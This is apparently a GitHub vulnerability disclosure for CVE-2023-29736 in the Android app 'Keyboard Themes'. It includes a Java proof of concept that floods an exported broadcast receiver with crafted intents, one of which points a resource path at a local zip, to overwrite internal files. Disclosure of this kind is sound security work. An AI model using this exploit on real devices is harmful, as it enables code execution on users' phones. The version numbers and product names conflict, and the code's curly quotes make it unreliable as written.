Headline
CVE-2023-29736: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
Keyboard Themes 1.275.1.164 for Android contains a dictionary traversal vulnerability that allows unauthorized apps to overwrite arbitrary files in its internal storage and achieve arbitrary code execution.
Code execution exists in Keyboard Themes For Android (CVE-2023-29736)
Vendor:T-ME Studios (https://corporate.timmystudios.com/)
Affected product:Keyboard Themes For Android (com.jb.gokeyboard.theme.tmekeyboardthemeforandroid)
Version:1.2
Download link:https://play.google.com/store/apps/details?id=com.jb.gokeyboard.theme.tmekeyboardthemeforandroid
Description of the vulnerability for use in the CVE:Fast Typing Keyboard v1.275.1.162 allows unauthorized apps to overwrite arbitrary files in its internal storage via a dictionary traversal vulnerability and achieve arbitrary code execution.
poc:
private void attack() { while (true) { Intent intent = new Intent(); ComponentName componentName = new ComponentName("com.jb.gokeyboard.theme.tmekeyboardthemeforandroid", “com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver”); intent.setComponent(componentName); intent.setAction(“com.timmystudios.redrawkeyboard.intent.action.THEME_APPLIED”); intent.putExtra(“package-name","com.ludashi.xsuperclean”); intent.putExtra("selected-font",true); intent.putExtra(“font_name","hack”); intent.putExtra(“font_id","2”); intent.putExtra(“font_resource","hackkkk”); intent.putExtra("font_size",123456); intent.putExtra("selected-sound",true); intent.putExtra(“sound_name","hack”); intent.putExtra(“sound_id","2”); intent.putExtra(“sound_resource","hackkkk”); intent.putExtra("sound_size",123456); intent.putExtra("go_theme_id",3); intent.putExtra(“go_res_zip_path","/data/local/tmp/test.zip”); try { sendBroadcast(intent); } catch (Exception e) {
}
}
}